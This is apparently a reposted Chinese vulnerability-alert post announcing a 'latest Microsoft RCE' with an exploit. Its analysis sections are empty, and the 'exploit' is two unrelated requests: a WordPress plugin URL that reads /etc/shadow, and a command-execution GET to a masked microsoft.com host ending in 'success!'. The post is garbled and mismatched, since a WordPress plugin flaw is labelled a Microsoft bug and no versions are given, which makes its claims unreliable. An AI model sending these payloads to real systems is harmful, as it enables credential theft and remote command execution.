0x01 前言
微软RCE。
0x02 漏洞影响
0x03 漏洞复现
0x04 修复方案
影响版本
微软~~~
EXP如下:
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=/etc/shadow
GET /pages/systemcall.php?command=id HTTP/1.1
Host: ***.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: */*
Origin: chrome-extension://bhimnoepicmcjfkbmhckamllnibadfal
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
success!
请升级最新版本。
原文始发于微信公众号(阿无安全):漏洞速递 | Microsoft微软最新RCE漏洞(附EXP)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论